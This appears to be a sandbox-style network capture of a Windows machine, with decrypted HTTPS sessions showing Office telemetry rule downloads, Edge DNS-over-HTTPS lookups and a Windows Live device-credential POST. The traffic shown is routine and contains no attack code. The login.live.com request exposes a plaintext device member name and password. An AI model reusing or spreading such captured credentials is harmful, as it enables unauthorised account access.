2024-11-09 01:48:00 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 43 68 61 72 74 69 6e 67 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 43 68 61 72 74 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Charting" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenCharting" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.7	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:31 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-16547b76f7f76p6chC1DFWctqw0000000ahg00000000drc1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:31 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
2024-11-09 01:48:00 UTC	192	OUT	GET /rules/rule702001v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:48:00 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:48:00 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB7EA38B" x-ms-request-id: 95b3fc24-f01e-0085-215f-2e88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014800Z-17df447cdb5fzdpxhC1DFWdd3400000006xg00000000enmk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:48:00 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 43 61 6e 76 61 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 43 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Canvas.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenCan

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.7	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 07c90e24-501e-007b-7e5c-2e5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-17df447cdb5l865xhC1DFW9n7g00000003qg000000008ay8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:31 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"
2024-11-09 01:48:00 UTC	192	OUT	GET /rules/rule702601v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:48:00 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:48:00 GMT Content-Type: text/xml Content-Length: 1409 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:52 GMT ETag: "0x8DC582BE4B338DC" x-ms-request-id: 99b6fab6-e01e-000c-36d2-2c8e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014800Z-16547b76f7fp6mhthC1DFWrggn0000000an0000000005y1w x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:48:00 UTC	1409	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 41 75 74 6f 54 65 6d 70 6c 61 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702601" V="1" DC="SM" EN="Office.Telemetry.Event.Office.AutoTemplate.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.7	52978	172.64.41.3	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-09 01:47:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-09 01:47:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dfa22a0fb696b3f-DFW alt-svc: h3=":443"; ma=86400
2024-11-09 01:47:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fa 71 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomq^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.7	52979	172.64.41.3	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-09 01:47:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-09 01:47:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dfa22a0fb0e6b17-DFW alt-svc: h3=":443"; ma=86400
2024-11-09 01:47:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e2 00 04 8e fa 71 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomq^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.7	52981	172.64.41.3	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-09 01:47:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-09 01:47:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8dfa22a10ded45ef-DFW alt-svc: h3=":443"; ma=86400
2024-11-09 01:47:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 93 00 04 8e fa 71 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomq^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.7	52977	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	446	OUT	POST /ppsecure/deviceaddcredential.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 7642 Host: login.live.com
2024-11-09 01:47:31 UTC	7642	OUT	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 6d 66 68 70 70 79 64 72 67 67 71 73 6a 73 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 39 56 50 5a 78 44 32 6b 46 34 39 7e 71 2f 7e 44 7e 36 3b 67 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 71 74 6c 74 6e 74 63 62 72 65 71 75 61 6a 3c 2f 4f 6c 64 4d Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02mfhppydrggqsjs</Membername><Password>9VPZxD2kF49~q/~D~6;g</Password></Authentication><OldMembername>02qtltntcbrequaj</OldM
2024-11-09 01:47:37 UTC	542	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/xml Expires: Sat, 09 Nov 2024 01:46:32 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C526_SN1 x-ms-request-id: f18f5c4a-4d46-4aa1-8bcb-ab4adce2ebf0 PPServer: PPV: 30 H: SN1PEPF0002F168 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sat, 09 Nov 2024 01:47:37 GMT Connection: close Content-Length: 17166
2024-11-09 01:47:37 UTC	15842	IN	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 38 30 31 30 31 41 36 43 44 39 30 35 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 65 36 62 37 31 38 38 61 2d 38 37 38 30 2d 34 33 63 61 2d 62 66 37 37 2d 35 36 31 62 62 34 62 36 35 66 39 35 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>001880101A6CD905</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="e6b7188a-8780-43ca-bf77-561bb4b65f95" LicenseID="3252b20c-d425-4711
2024-11-09 01:47:37 UTC	1324	IN	Data Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.7	52989	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 9bdb129b-701e-0053-7392-303a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-17df447cdb5c9wvxhC1DFWn08n000000073g000000006h82 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.7	52986	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:32 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-16547b76f7fkj7j4hC1DFW0a9g0000000adg00000000e65y x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:32 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> 